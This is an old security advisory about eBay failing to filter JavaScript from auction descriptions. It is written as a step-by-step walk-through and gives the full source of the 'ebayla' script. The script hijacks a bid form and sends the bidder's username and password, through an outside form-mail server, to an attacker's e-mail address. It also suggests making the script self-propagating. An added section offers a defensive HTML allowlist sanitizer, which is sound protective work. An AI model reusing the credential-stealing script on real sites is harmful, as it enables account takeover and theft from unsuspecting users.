eBay (www.ebay.com), an online auction web site, does not filter active JavaScript code out of its auction item descriptions, giving attackers a way to obtain confidential information from unsuspecting customers.
Credit:
The vulnerability was found by: Blue Adept (www.because-we-can.com)
A security hole allows malicious eBay users to easily steal the passwords of other eBay users. The exploit involves posting an item for bid whose description contains malicious JavaScript code.
When an unsuspecting eBay user places a bid on the item, the embedded JavaScript code captures the username and password typed into the bid form and sends them to the malicious user via e-mail. The bid itself still goes through, so from the victim's point of view nothing unusual has occurred, and they are unlikely to report it.
Once a malicious user knows the username/password of the victim's eBay account, he can assume full control of the account, including the ability to:
* create new auctions (automatically charging the victim's account).
* place bids in the victim's name.
* retract legitimate bids in the victim's name.
* change the victim's username/password, barring them from eBay.
* associate bogus negative/positive comments with an arbitrary seller.
* prematurely close an auction being run by the victim.
* insert the ebayla code into the victim's own auctions (the code could be altered to do this automatically, turning ebayla into a self-propagating worm).
The security problem is dangerously simple. A malicious user needs only to embed the JavaScript code into their description of an item for auction. A simple walk through of the exploit demonstrates step-by-step how any user can steal eBay passwords:
Step 1:
Visit eBay.com and register for a free user account.
Step 2:
Go to the seller's area to post an item for auction. When asked to enter the description of the item, enter the following description, which contains the ebayla code. The first statement of the script sets the e-mail address to which usernames and passwords are sent.
<script>
// Mailbox that receives the harvested credentials; the only line an attacker needs to change.
recipient = "blue_adept@because-we-can.com";
// Replaces the current page with a two-frame layout: the visible top frame
// loads the real bid URL so the bid still goes through and the victim sees
// nothing unusual; the zero-height bottom frame receives a form that POSTs the
// username and password to the mailer as soon as it loads.
function printframeset(place_bid, mailUrl, username, password){
document.open();
document.writeln('<script>');
document.writeln('function go(){');
document.writeln('top.b.document.open();');
document.writeln('top.b.document.writeln("<body onLoad=document.form1.submit()>");');
document.writeln('top.b.document.writeln("<form name=form1 method=POST action=' + mailUrl + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=username value=' + username + '>");');
document.writeln('top.b.document.writeln("<input type=hidden name=password value=' + password + '>");');
document.writeln('top.b.document.writeln("</form>")');
document.writeln('top.b.document.close();');
document.writeln('}');
// Split so the browser does not treat this string as the end of the outer script block.
document.writeln('</scr' + 'ipt>');
document.writeln('</head>');
document.writeln('<frameset rows="100%,*" onLoad="go()">');
document.writeln('<frame name="t" src="' + place_bid + '">');
document.writeln('<frame name="b" src="">');
document.writeln('</frameset>');
document.close();
}
// Percent-encodes a form value so it survives in the bid query string and in the generated form.
function urlEncode(inStr) {
outStr=' '; //not '' for a NS bug!
for (i=0; i < inStr.length; i++) {
aChar=inStr.substring (i, i+1);
switch(aChar){
case '%': outStr += "%25"; break; case ',': outStr += "%2C"; break;
case '/': outStr += "%2F"; break; case ':': outStr += "%3A"; break;
case '~': outStr += "%7E"; break; case '!': outStr += "%21"; break;
case '"': outStr += "%22"; break; case '#': outStr += "%23"; break;
case '$': outStr += "%24"; break; case "'": outStr += "%27"; break;
case '`': outStr += "%60"; break; case '^': outStr += "%5E"; break;
case '&': outStr += "%26"; break; case '(': outStr += "%28"; break;
case ')': outStr += "%29"; break; case '+': outStr += "%2B"; break;
case '{': outStr += "%7B"; break; case '|': outStr += "%7C"; break;
case '}': outStr += "%7D"; break; case ';': outStr += "%3B"; break;
case '<': outStr += "%3C"; break; case '=': outStr += "%3D"; break;
case '>': outStr += "%3E"; break; case '?': outStr += "%3F"; break;
case '[': outStr += "%5B"; break; case '\\': outStr += "%5C"; break;
case ']': outStr += "%5D"; break; case ' ': outStr += "+"; break;
default: outStr += aChar;
}
}
return outStr.substring(1, outStr.length);
}
// Redirects the bid form's submit to ebayla() instead of eBay's bid handler.
function newaction(){
window.document.forms[0].action="javascript:ebayla()";
}
// Reads the item, user ID, password and maximum bid from the bid form, rebuilds
// eBay's own MakeBid URL from them, and hands everything to printframeset().
function ebayla(){
item = urlEncode(window.document.forms[0].item.value);
username = urlEncode(window.document.forms[0].userid.value);
password = urlEncode(window.document.forms[0].pass.value);
maxbid = urlEncode(window.document.forms[0].maxbid.value);
bid_script = "http://cgi.ebay.com/aw-cgi/eBayISAPI.dll";
bid_query_string = "?MfcISAPICommand=MakeBid&item=" + item + "&userid=" + username
+ "&pass=" + password + "&maxbid=" + maxbid;
place_bid = bid_script + bid_query_string;
// Third-party form-to-mail script; the recipient address is passed in the query string.
mailscript = "http://204.225.88.132/cgi-bin/form1";
mailUrl = mailscript + '?|' + recipient;
printframeset(place_bid, mailUrl, username, password);
}
// Crude fingerprint of which eBay page is rendering the description: arm the
// hook (one second after load) only when the page's twelfth link is not the
// account-status page.
if(document.links[11] != "http://pages.ebay.com/aw/account-status.html"){
setTimeout("newaction()", 1000);
}
</script>
Step 4:
Wait for users to place/review bids on the item. Shortly afterwards, you will receive an e-mail message that contains the user's username and password.
Note:
In the exploit code described above, the part of the program that does the actual "dirty-work" of mailing the password and username is a randomly chosen server-side mailing script we found on the web. There are many equivalent and publicly available server-side mailing programs that can be used in its place.
That's it. You now have a working eBay username and password stealing item.
Unfortunately, security issues of this kind at eBay are difficult for an ordinary user to spot and avoid: the page looks and behaves normally, and the only trace is in the HTML source of the item description. If you are not comfortable inspecting the source of every auction page for suspicious JavaScript before bidding, the best way to protect yourself may be to avoid using eBay until adequate HTML filters have been implemented.
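As an added example, not code from the original advisory or from eBay, here is an allowlist filter of the kind the paragraph above calls for, written in JavaScript so it can run where the description is stored or rendered. The tag and attribute lists, the function names and the sample listing are this example's own choices. It keeps a few formatting tags, drops <script> blocks together with their contents, removes on* event handlers and javascript: URLs (including entity- and whitespace-obfuscated ones), and records what it removed so a listing can be rejected or logged rather than silently cleaned. The sample listing is constructed and reuses the hooks the ebayla payload relies on: a <script> block, a frameset with onLoad, and a javascript: form action.

```javascript
// Added example, not code from the original advisory or from eBay: an
// allowlist HTML filter for auction descriptions. Tag/attribute lists,
// function names and the sample listing are this example's own choices.

const ALLOWED_TAGS = new Set(["b", "i", "u", "p", "br", "a", "img", "ul", "ol", "li", "font"]);
const ALLOWED_ATTRS = { a: ["href"], img: ["src", "alt"], font: ["color", "size"] };
const URL_ATTRS = new Set(["href", "src", "action"]);
// Elements whose body is code rather than markup: dropped together with their contents.
const RAW_TEXT_TAGS = new Set(["script", "style"]);
// Disallowed elements that can execute or exfiltrate on their own (the ebayla hooks).
const ACTIVE_TAGS = new Set(["script", "style", "frameset", "frame", "iframe", "object",
  "embed", "applet", "form", "meta", "base", "link"]);

// One open or close tag with its attribute text; the "g" flag lets exec() start at an offset.
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;

const escapeText = s => s.replace(/&(?!(?:#\d+|#x[0-9a-fA-F]+|[a-zA-Z]+);)/g, "&amp;")
  .replace(/</g, "&lt;").replace(/>/g, "&gt;");
const escapeAttr = s => s.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
  .replace(/</g, "&lt;").replace(/>/g, "&gt;");

// Browsers decode character references in attribute values before interpreting
// a URL, so "java&#115;cript:" must be decoded before the scheme check.
const decodeEntities = v => v
  .replace(/&#x([0-9a-fA-F]+);?/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
  .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(Number(d)));

function isSafeUrl(raw) {
  // Control characters and whitespace are ignored inside a scheme ("java\tscript:").
  const url = decodeEntities(raw).replace(/[\x00-\x20]/g, "").toLowerCase();
  if (/^(https?|mailto):/.test(url)) return true;
  return !url.includes(":");  // scheme-less, i.e. relative, URL
}

// Emits the allowed attributes of one tag, recording every rejected one in `dropped`.
function filterAttrs(tag, attrText, dropped) {
  let out = "";
  for (const m of attrText.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] || m[3] || m[4] || "";
    if (name.startsWith("on")) { dropped.push({ kind: "handler", detail: name }); continue; }
    if (URL_ATTRS.has(name) && !isSafeUrl(value)) { dropped.push({ kind: "url", detail: value }); continue; }
    if (!(ALLOWED_ATTRS[tag] || []).includes(name)) { dropped.push({ kind: "attr", detail: name }); continue; }
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

// Returns { html, dropped }: the filtered markup plus a list of everything removed.
function sanitizeDescription(html) {
  const dropped = [];
  let out = "", i = 0;
  while (i < html.length) {
    const lt = html.indexOf("<", i);
    if (lt === -1) { out += escapeText(html.slice(i)); break; }
    out += escapeText(html.slice(i, lt));
    TAG_RE.lastIndex = lt;
    const m = TAG_RE.exec(html);
    if (!m || m.index !== lt) { out += "&lt;"; i = lt + 1; continue; }  // a bare "<" in text
    i = lt + m[0].length;
    const closing = m[1] === "/", name = m[2].toLowerCase();
    if (RAW_TEXT_TAGS.has(name)) {
      if (closing) continue;
      dropped.push({ kind: "script", detail: name });
      const endRe = new RegExp(`</${name}\\s*>`, "gi");  // skip the body up to the close tag (or end of input)
      endRe.lastIndex = i;
      const e = endRe.exec(html);
      i = e ? e.index + e[0].length : html.length;
      continue;
    }
    if (!ALLOWED_TAGS.has(name)) {  // drop the tag, keep its text; still record handlers/URLs it carried
      if (!closing) {
        dropped.push({ kind: ACTIVE_TAGS.has(name) ? "script" : "tag", detail: name });
        filterAttrs(name, m[3], dropped);
      }
      continue;
    }
    out += closing ? `</${name}>` : `<${name}${filterAttrs(name, m[3], dropped)}>`;
  }
  return { html: out, dropped };
}

// True when the listing carried something that could run code or exfiltrate
// data, as opposed to merely using a tag outside the allowlist (e.g. <table>).
const containsActiveContent = html =>
  sanitizeDescription(html).dropped.some(d => d.kind !== "tag" && d.kind !== "attr");

// Constructed sample listing reusing the hooks of the ebayla payload.
const SAMPLE_LISTING = [
  '<b>Mint 1921 silver dollar</b><br>',
  '<img src="coin.jpg" alt="obverse">',
  '<script>recipient = "blue_adept@because-we-can.com";',
  "document.writeln('</scr' + 'ipt>');",
  'setTimeout("newaction()", 1000);</script>',
  '<frameset rows="100%,*" onLoad="go()"><frame name="b" src=""></frameset>',
  '<form name=form1 method=POST action=javascript:ebayla()></form>',
  '<a href="java&#115;cript:ebayla()">details</a>',
  '<a href="http://pages.ebay.com/aw/account-status.html">account status</a>',
].join("\n");

const report = sanitizeDescription(SAMPLE_LISTING);
console.log(report.html);
console.log(report.dropped.map(d => `${d.kind}:${d.detail}`).join(", "));
```

A production filter should be built on a real HTML parser rather than on regular expressions, but the rules are what matter: allowlist tags, allowlist attributes per tag, reject every on* handler, and canonicalise a URL (decode entities, strip control characters) before checking its scheme. Those rules are exactly what eBay's description field lacked at the time of the advisory; note also that the split `</scr' + 'ipt>` trick in the payload does not help the attacker here, because the filter discards the whole script body rather than looking for a closing tag inside it.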
The walk-through above demonstrates how the ebayla bug can be easily exploited to steal usernames and passwords from eBay users. The resources required to launch the attack are minimal and freely available: a free eBay account, a web browser, and a publicly available server-side mailing script. The exploit as written works with Netscape Communicator only.